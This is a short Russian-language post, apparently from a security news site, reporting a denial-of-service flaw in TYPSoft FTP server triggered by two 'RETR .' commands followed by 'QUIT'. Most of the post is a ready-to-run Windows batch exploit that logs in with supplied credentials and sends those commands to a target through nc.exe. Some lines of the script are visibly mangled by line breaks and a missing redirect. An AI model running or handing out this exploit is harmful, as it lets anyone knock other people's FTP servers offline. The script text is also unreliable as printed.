Уязвимость обнаружена в TYPSoft FTP server. Удаленный авторизованный пользователь может вызвать условия отказа в обслуживании на целевом сервере.
Удаленный авторизованный пользователем (включая анонимного пользователя) может выполнить две последовательных команды "RETR .", за которыми следует команда "QUIT", чтобы вызвать условия отказа в обслуживании на целевом FTP сервере. 

Эксплоит: 

@echo off
if '%3'=='' echo Usage:%0 target ^<UserName^> ^<PassWord^> [port]&goto 
:eof
set FTPUSER=%2
set FTPPWD=%3
set PORT=21
if not '%4'=='' set PORT=%4
for %%n in (nc.exe) do if not exist %%~$PATH:n if not exist nc.exe 
echo Need nc.exe&goto :eof

echo USER %FTPUSER%ftp.cmd
echo PASS %FTPPWD%>ftp.cmd
echo RETR .>>ftp.cmd
echo RETR .>>ftp.cmd
echo QUIT>>ftp.cmd
nc -v %1 %PORT%<ftp.cmd
del ftp.cm
d

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии